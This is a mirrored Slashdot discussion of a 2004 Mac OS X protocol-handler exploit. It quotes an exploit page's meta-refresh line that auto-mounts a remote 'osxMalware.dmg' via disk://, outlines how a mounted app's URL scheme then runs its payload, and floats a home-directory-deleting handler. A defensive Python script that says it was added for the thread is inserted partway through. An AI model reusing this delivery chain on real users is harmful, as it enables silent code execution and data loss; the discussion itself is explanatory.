Slashdot Mirror


Yet Another Mac OS X Protocol Handler Exploit

Rosyna writes "Apple just can't get any breaks lately. First the help protocol handler exploit (which has been fixed), then the telnet handler exploit, and now an exploit for any arbitrary protocol handler: make your own, then exploit it. You can auto mount a volume in Mac OS X via the disk, afp, or ftp handlers (and probably others). Paranoid Android will help prevent exploitation until Apple fixes the problem." The hole here is that when a volume with an application on it is mounted, Apple registers the application's specified protocol handlers, without additional user action. Another option is to disable those handlers that allow volume mounting, but playing that game, obviously, isn't a guaranteed win in the long run.

29 of 155 comments

  1. MS influence? by Anonymous Coward · · Score: 5, Funny

    What'd they do, hire the security team away from Microsoft?

    1. Re:MS influence? by rspress · · Score: 4, Funny

      At Microsoft is one person considered a team?

  2. Fear Bill G, Fear! by Councilor+Hart · · Score: 4, Funny
    Wow, if I were Billy boy, I would start worrying now.
    First, there is al this talk of switching to linux.
    And now even the virus writers are starting to pay attention to something else besides windows.
    Finally the end is near.
    Goodbye Billy...

    On the other hand, I do use Mac OS X.
    D'Oh...

  3. As an Apple Afficionado, I'm delighted. by Anonymous Coward · · Score: 5, Insightful

    I love my Apple computers and I adore OS X.

    That said, I'm immensely relieved the floodgates to OS X exploitation have finally been thrown open.

    Allow me to explain.

    Too long Apple users have gloated (senselessly) that OS X is somehow more secure than Windows. This collective delusion has lulled everyone into a false sense of security. Being one of the few who bothers to "secure" his OS X installation, I am often jeered at for being paranoid - unnecessarily so, according to my detractors.

    But the truth is that no software system is perfect. This is the wake-up call for Apple and its users to realise they need to watch out too. I relish this because taking action *now* to purge OS X of its deficiencies will prevent the pitiful scene common to Windows users. I don't want OS X exploited on a daily basis as happens with Windows. I want OS X to be secure!

    There will be much displeasure in the short-term, but that which does not kill us only makes us stronger.

    1. Re:As an Apple Afficionado, I'm delighted. by yotaku · · Score: 5, Insightful

      Absolutely. And the same thing would happen with any other OS that was set up and used by anyone not in the computer elite. There will always be holes in the OS. But given careful administration, most are not too much of a problem. This is true for OS X, Windows, and *nix.

      I just hope, as you say that it will shut the Mac fans up about their "immune OS that will never suffer from security holes as windows does". Guess what, it will - and has.

    2. Re:As an Apple Afficionado, I'm delighted. by Anonymous Coward · · Score: 5, Interesting

      I did not realize that "being secure" was a boolean.

      Too long Apple users have gloated (senselessley) that OS X is somehow more secure than Windows

      So something is either completely secure (along the lines of OpenBSD), or it is as open as Windows. And there is no middle ground there?

      Even with the current exploits, OS X is still significantly more secure than most Windows installs.

      Yes, I agree that OS X users need to take precautions and not just rely on the security of their machine. Even then, though, you can tell someone deciding between OS X and Windows "If you are reasonably careful on both platforms, you are still less likely to have problems with OS X, due to its security already in place."

    3. Re:As an Apple Afficionado, I'm delighted. by Jord · · Score: 5, Insightful
      I love the way this comment was presented. Sounds like some finely crafted FUD more than anything else. Yes, an exploit has been found in OSX. Does that make OSX as vulnerable as Windows? Not even close, not even on the same planet.

      Windows has had so many exploits that I can't even keep track. One exploit, not even a root exploit (a very important distinction) does not make OSX as vulnerable as Windows. There still are no worms, no viruses attributed to OSX.

      Yes, this was due. It was going to happen. But OSX is still infinitely more secure than windows and more than likely always will be. Let's not fly off half-cocked and make wild statements like this.

    4. Re:As an Apple Afficionado, I'm delighted. by mikedaisey · · Score: 4, Insightful


      I agree with your sentiment--I want a secure system, and seeing it challenged early will help it be so. But the fact of the matter is that OSX ships by default many degrees of magnitude more secure than Windows does.

      Yes, this has resulted in some unnecessary gloating from Macheads, and it makes folks lazy with their security--that's unfortunate. But that doesn't diminish the security successes Apple's had with OS X.

    5. Re:As an Apple Afficionado, I'm delighted. by Jord · · Score: 5, Insightful
      I suggest you take a look at track records before spouting off about who is better at what.

      I am not saying that OS X is perfect. Far from it, I am a programmer myself and I understand the realities of software design. However, based on track records alone, OS X is far ahead of even the most current windows implementation. How many exploits are there that auto install software on OS X? None. How many worms are there for OS X? None. How many pieces of auto-installing spyware are there for OS X? None. How many viruses? None. OS X IS more secure than windows. It's not perfect but I will put my money behind the security in OS X any day.

      In any event, it was completely expected that the Windows zealots would come out of the woodwork as soon as the first vulnerability was found in OS X. Now it begins. We will see plenty of zealots crying how no operating system is safe. Guess what, windows is still a poorly written piece of garbage and no amount of throwing mud (or fud) is going to change that.

    6. Re:As an Apple Afficionado, I'm delighted. by Jord · · Score: 4, Insightful
      The large audience argument has been mentioned many many times in the past and personally I disagree with it. There is a real world example of this exact situation. Microsoft IIS. Its "market percentage" is very tiny and yet it gets hit with worms because it is insecure. On the other hand, Apache, which has a huge market percentage, does not get hit because it is secure.

      Granted this is dumbing down the details by a HUGE amount but the point is still there. Microsoft software does not have the most worms/viruses/etc because it has the most market share, it has the most worms/viruses/etc because it is the most poorly written. Granted, if their market share was zero, then obviously the exploits would not be big news, but the clear point that is made is that if OS X were as vulnerable as Windows we would be seeing worms and viruses. The fact that there are none reported goes a long way to show the strength of the operating system.

      BTW you could easily replace OS X with BSD, Linux in this statement and the statement still holds true. Software written with security in mind is clearly more secure. Windows was clearly not written with security in mind.

  4. This is a Launch Services exploit by mst76 · · Score: 4, Interesting
    For more information, see the Carbon docs, in particular, the section "Registering Applications":
    The Finder automatically registers all applications as it becomes aware of them, such as when they are dragged onto the user's disk or when the user navigates to a folder containing them.
    and as we see with this exploit, whenever a volume is mounted. Doh! This is one of those handy MacOS features where the OS seems to find the right application as if by Magic even when the app is moved around. In this case though, it appears that too much Convenience has compromised Security. We can't really blame them though, I think this behaviour was inherited from Classic MacOS, before everyone was networked, and before security was such a big issue as it is today. The real test of Apple is how long it will take them to fix this hole.
    1. Re:This is a Launch Services exploit by aristotle-dude · · Score: 4, Interesting
      This is not a launch services exploit. Get your facts straight. It is an exploit that uses the disk protocol in conjunction with the Launch services "Registering Applications" feature. Application registration is a feature that I do not want to see disappear.

      I would like Apple to add a mandatory confirmation dialogue with warnings about possible security risks from mounting images from untrusted sources on any attempt to mount a disk image from the internet.

      This would give the user ample warning and a chance to prevent the exploit.

      Another alternative would be to do the above and include the option in the security prefs pane to enable/disable mounting of internet disk images.

      --
      Jesus was a compassionate social conservative who called individuals to sin no more.
  5. It just works! by OneDeeTenTee · · Score: 5, Insightful

    Seriously though, once Linux becomes a real choice for average desktop users we'll be seeing Linux exploits as well.

    --
    Stop the world; I need to get off.
  6. Resetting "help:" to Help Viewer by TomSawyer · · Score: 4, Informative
    I'm posting this in case I'm not the only one who ran into trouble resetting "help:" to the Help Viewer. Before the security update came out I'd set the "help:" protocol to point to chess. If you want to point "help:" back to the Help Viewer you'll find the app in /System/Library/CoreServices/

    Fire up MisFox again and update the help protocol helper to /System/Library/CoreServices/Help Viewer.app

    --
    If you disagree then it must be overrated, redundant or trolling.
  7. How this hole was discovered by mst76 · · Score: 5, Informative

    This issue was discovered on the MacNN forum, when they were discussing the previous exploit. The accepted workaround was downloading one of the utilities to change the protocol helpers, but the user kampl refused to have any non-Apple "security fix" on his system (he never acknowledged that the utilities were not security fixes at all, just tools to change user preferences). His solution was to delete the HelpViewer app from his system. One bright member of the forum pointed out that that isn't enough: you could probably just stick the HelpViewer on the .dmg image and LaunchServices would find it there. Another poster realized this might work for any application if you bind it to a bogus protocol in the Info.plist file, so there is no need for HelpViewer at all. A third poster had a sample exploit coded in no time. Apple was promptly notified, so we can expect another fix soon (hopefully).

    1. Re:How this hole was discovered by Fulkkari · · Score: 5, Insightful

      I'm a bit amazed at how well the Mac community has co-operated in finding these security flaws. Even though the flaws are always bad things, this just shows how strong the community actually is. And it sure feels good to be a part of it.

      --
      I demand the Cone of Silence!
    2. Re:How this hole was discovered by Midnight+Thunder · · Score: 4, Insightful

      this just shows how strong the community actually

      It does, but it also shows the importance of community. This is one thing that I feel should be taken into account when creating a product. If you can create a community around your product then people will discuss what they like, what they don't like, and generally people will talk about your product. All this needs to be, to start with, is a help forum with provision for generalised discussion. If people are part of the community then they are likely to help push the product.

      --
      Jumpstart the tartan drive.
  8. Also uses meta-refresh by tbmaddux · · Score: 4, Interesting
    The Finder automatically registers all applications as it becomes aware of them, such as when they are dragged onto the user's disk or when the user navigates to a folder containing them.
    and as we see with this exploit, whenever a volume is mounted.
    IMO the volume should never be downloaded or mounted. The exploit page includes the following:
    <meta HTTP-EQUIV="refresh" content="0; URL=disk://www.geekspiff.com/unlinkedCrap/osxMalware.dmg">
    So first off this is another exploit of the "disk:" protocol handler. The arbitrary protocol depends on the automatic download and mounting of that DMG file through the handler. It's definitely a security hole for that volume to get auto-mounted through meta-refresh, and I question whether it should even be downloaded. At a bare minimum the download should obey the preferences set in Safari about whether or not to open "safe" downloads, and disk image autorun upon mounting should be deactivatable (if not disabled entirely).
    --
    Can't you see that everyone is buying station wagons?
    1. Re:Also uses meta-refresh by Graymalkin · · Score: 4, Insightful

      The disk: protocol is designed to automount images off the web, that is why it exists in the first place. Developers can offer up images off their sites users can mount directly so there's no need to download the image, install the app, and delete the image. Once the app is installed the user can just unmount it. It is a nice functionality but Apple needs to sandbox the process since an image mounted off the web should be untrusted.

      --
      I'm a loner Dottie, a Rebel.
    2. Re:Also uses meta-refresh by steeviant · · Score: 4, Informative

      Actually, this IS an exploit.

      Using this technique, an attacker can cause a disk image to open on your machine, the OS will then faithfully install any arbitrary URL handlers that applications on that disk image say they can handle (for example a deletefile: URL handler), then the same website can forward you to a deletefile://~ URL, thus deleting your home directory.

      While it would be easy to tell that the web site is opening a disk image, and the application it starts would probably appear in the Dock, it doesn't make it easy to prevent the Application on the disk image from being executed using this method.

  9. Much Ado About Not Much... by lgw4 · · Score: 5, Interesting
    I think this is mainly a PR stunt.
    <quote>
    Sample Exploit

    I've written a sample exploit that delivers and executes its payload without user intervention and operates by registering its own URL scheme handler. Until Paranoid Android, there was no way of protecting against this attack, which freaked me out enough to write Paranoid Android. :)

    If you click the sample exploit link below, here's what will happen:

    • A disk image named MalwareDiskImage will be mounted on your desktop.
    • LaunchServices will read the Info.plist file of the application in this disk image automatically, and register the application as the default handler for URLs with a 'malware' scheme.
    • The webpage will wait 10 seconds, and then redirect to malware:unused, causing LaunchServices to launch the payload application within the disk image.
    • The application within the disk image will write a text file to the user's home directory called owned.txt explaining that the machine has been exploited, will present an alert to the user, and will eject the disk image.

    Because this sample exploit registers its own URL scheme, none of the methods people had been using involving disabling certain scripts, moving Help.app or changing the 'help' URL scheme would protect against it. At this time, only Paranoid Android provides protection from it.

    benign sample exploit -->innocousPage.html

    Portions of this sample exploit are based heavily on a prior sample exploit at insecure.ws

    Conclusions

    Until Apple fixes this vulnerability, you should install Paranoid Android and surf safely.

    Copyright Jason Harris, 2004, All Rights Reserved

    </quote>
    I'm using 10.3.3 and when I click on the sample exploit URI, nothing happens -- nothing. I've tried this thing 10+ times, scoured my HD for "owned.txt" and can find nothing. Of course, I installed the RCDefaultApp PreferencePane a couple of days ago and had already followed the suggestions posted by John Gruber on http://daringfireball.net but since Paranoid Android is the ONLY thing that can protect against this exploit, I'm at a loss as to explain why my machines aren't affected.
    1. Re:Much Ado About Not Much... by Rosyna · · Score: 4, Informative

      The sample exploit is only for disk.

      Try one of these if you are so confident this is a PR stunt: http://ozwix.dk/OpnAppFixer/testit.html

  10. Re:Maybe I'm missing something by HeghmoH · · Score: 4, Informative

    No, that's not it at all. What they're saying is that if you visit a properly-constructed web page, that page can cause your computer to execute arbitrary code without any further intervention on your part. You just go to the URL, and a few seconds later you've been owned.

    --
    Mod down posts with a "Free Mac Mini/iPod" sig, they're spam!
  11. Re:Alright by Jord · · Score: 4, Interesting
    how many times have you downloaded something from Safari, to have it automount, and even run the installer?

    Hmmm...Never. I have had Safari automount more disk images than I can count. Some of them have a EULA auto pop-up but never have I seen one run the installer automatically. If that were to happen, we would have seen a trojan on OSX a lot sooner.

  12. Re:More Shoes by Amiga+Lover · · Score: 4, Interesting

    Can't trojans that get onto Macs turn into bona-fide worms, distributing themselves via Address Book and HTML e-mail that does the 'disk://' download?

    Theoretically yes.

    It's certainly possible to click on a link and have it run code that emails everyone in your address books with a mail that also has that same link in it. That would spread the link to many other people, many of whom would click on it.

    However, as yet the code only runs in userland and can stay executing no longer than the current session. Rebooting will kill it and it won't come back unless clicked again. Because of that its ability to drop a payload that will be useful later to intrude on the machine is limited.

  13. The workarounds available at the moment by theolein · · Score: 4, Informative

    There are a number of workarounds at the moment:

    1. The best is Paranoid Android linked to in the article itself. PA itself uses the APE kernel extension from Unsanity, however, and some people have reported problems with this.

    2. Another method is to use Internet Explorer, MisFox or MoreInternet to set the following protocol helpers which can mount volumes, to point to an innocuous application, such as Chess.
    ftp:
    afp:
    disk:
    disks:

    3. In a public environment where there are some automatically mounted network shares such as in a university, school or company, you would also have to take into account protocols such as:
    nfs:
    webdav:
    smb:
    cifs:
    but these are less likely to be used in conjunction with this vulnerability as it would be more difficult to get one of these users to simultaneously go to a webpage that exploits this.
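Comment 7 above describes the mechanism (an application on a mounted image binds a scheme of its choosing in its Info.plist, and Launch Services registers it on mount) and comment 13 lists the schemes whose handlers can mount a volume. The script below is an added example written for this thread; it is not code from the Slashdot discussion, from Paranoid Android, or from Apple. It audits what an application bundle would register: it reads the standard CFBundleURLTypes / CFBundleURLSchemes keys from Info.plist, reports any scheme that matches the volume-mounting list from comment 13, and reports any scheme not in a caller-supplied set of recognised ones. The sample Info.plist, its bundle identifier and the schemes it declares are constructed for illustration; the `scan_volume` helper that walks a mounted volume for .app bundles is an assumption about bundle layout (Contents/Info.plist), not something the thread states.

```python
"""Audit the URL schemes an application bundle declares in its Info.plist.

Added example for the Slashdot thread above; not the thread's, Apple's or
Paranoid Android's code. Assumes the standard Info.plist keys
CFBundleURLTypes / CFBundleURLSchemes and the .app/Contents/Info.plist layout.
"""
import os
import plistlib
from typing import Any, Dict, Iterable, List

# Schemes that comment 13 names as able to mount a volume. An app on an
# untrusted image that claims one of these is worth a second look.
VOLUME_MOUNT_SCHEMES = {"ftp", "afp", "disk", "disks", "nfs", "webdav", "smb", "cifs"}

# Constructed Info.plist of a hypothetical application on a disk image.
# The bundle identifier and both schemes are made up for this example.
SAMPLE_INFO_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>CFBundleIdentifier</key>
  <string>example.constructed.payload</string>
  <key>CFBundleURLTypes</key>
  <array>
    <dict>
      <key>CFBundleURLName</key>
      <string>Constructed scheme</string>
      <key>CFBundleURLSchemes</key>
      <array>
        <string>malware</string>
        <string>afp</string>
      </array>
    </dict>
  </array>
</dict>
</plist>
"""


def url_schemes(info_plist: bytes) -> List[str]:
    """Return every URL scheme the bundle declares, lower-cased, in file order."""
    plist = plistlib.loads(info_plist)
    found: List[str] = []
    for url_type in plist.get("CFBundleURLTypes", []):
        for scheme in url_type.get("CFBundleURLSchemes", []):
            found.append(str(scheme).lower())
    return found


def audit(info_plist: bytes, recognised: Iterable[str]) -> Dict[str, Any]:
    """Classify the declared schemes.

    claims_mount_scheme: schemes from the volume-mounting list in comment 13.
    unrecognised_schemes: schemes neither recognised by the caller nor on that list,
    i.e. the "bogus protocol" case comment 7 describes.
    """
    recognised_set = {s.lower() for s in recognised}
    plist = plistlib.loads(info_plist)
    schemes = url_schemes(info_plist)
    return {
        "bundle_id": plist.get("CFBundleIdentifier", "<no CFBundleIdentifier>"),
        "schemes": schemes,
        "claims_mount_scheme": [s for s in schemes if s in VOLUME_MOUNT_SCHEMES],
        "unrecognised_schemes": [
            s for s in schemes
            if s not in recognised_set and s not in VOLUME_MOUNT_SCHEMES
        ],
    }


def scan_volume(root: str, recognised: Iterable[str]) -> List[Dict[str, Any]]:
    """Walk a mounted volume and audit every *.app bundle that carries an Info.plist."""
    reports: List[Dict[str, Any]] = []
    for dirpath, dirnames, _ in os.walk(root):
        for name in dirnames:
            if not name.endswith(".app"):
                continue
            plist_path = os.path.join(dirpath, name, "Contents", "Info.plist")
            if os.path.isfile(plist_path):
                with open(plist_path, "rb") as fh:
                    report = audit(fh.read(), recognised)
                report["path"] = os.path.join(dirpath, name)
                reports.append(report)
    return reports


if __name__ == "__main__":
    import sys
    # Schemes a user might already expect on the system (assumed list).
    known = {"http", "https", "mailto", "help", "telnet"}
    if len(sys.argv) > 1:
        for r in scan_volume(sys.argv[1], known):
            print(r)
    else:
        print(audit(SAMPLE_INFO_PLIST, known))
```

Run it with the mount point of a volume as the only argument (for example `python audit_schemes.py /Volumes/SomeImage`) to list, per bundle, which schemes would be registered and which ones deserve attention before anything on that image is opened; with no argument it audits the constructed sample plist.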

  14. The reaction of my friends by Go+Aptran · · Score: 4, Funny
    My Windows using friends keep calling and consoling me... I think they expect me to kill myself, or something.

    --

    "Under the spreading chestnut tree, I sold you and you sold me."

  15. Re:Same thing by prockcore · · Score: 4, Informative


    That's it. No web page can exploit this arbitrary protocol problem if you do step 1 above. Step 2 fixes the help: issue, and step 3 fixes all other known issues.

    Why does this warrant 4 stories in 4 days?


    It warranted 4 stories in 4 days because people like you misunderstand the problem.

    Step 1 doesn't fix anything... disk: ftp: afp: protocols still allow automounting of volumes from a webpage.

    Step 2 fixes help and telnet, but those aren't the whole issue.

    Step 3 is a step in the right direction, but you'll also need to disable ftp: and afp: since they both can be used in the same way.

    Disabling ftp means you can't open any ftp volumes without jumping through hoops. I always thought it was stupid that safari didn't handle ftp directly though.

    The solution isn't an easy one, and Apple is going to have to do something that MS and Linux have dealt with in the past... sacrifice ease-of-use for security.

  16. Re:Maybe I'm missing something by HeghmoH · · Score: 4, Informative

    Funny, how these assumptions happen.

    I'm a Mac owner. I've owned nothing but Apple computers, first an Apple IIGS then a series of Macs. I love them, and I think Apple is great. But that doesn't prevent me from facing reality.

    The fact is, it doesn't matter if "only" your user account is compromised, and root remains secure. What can a trojan possibly do to your computer that you don't want it to do? It can delete files, spy on you, and proxy spam or other malicious network connections. It can do all of this with "only" your user account. You don't have to be root to proxy anything. You don't have to be root to run a keylogger or run a heuristic that greps for credit card numbers. You don't have to be root to trash all of the files in your home directory, which should be the only ones you care about. Who cares if the trojan can't trash the stuff in /System? You can get that off of a CD in half an hour. It's the documents, pictures, movies, and music that you have that are difficult to replace, and owning your user account is enough for a virus to destroy them.

    The unix permissions model is great on multiuser systems, but on a home desktop it really just doesn't help that much. It's nice, but it fails to protect that which I care most about.

    --
    Mod down posts with a "Free Mac Mini/iPod" sig, they're spam!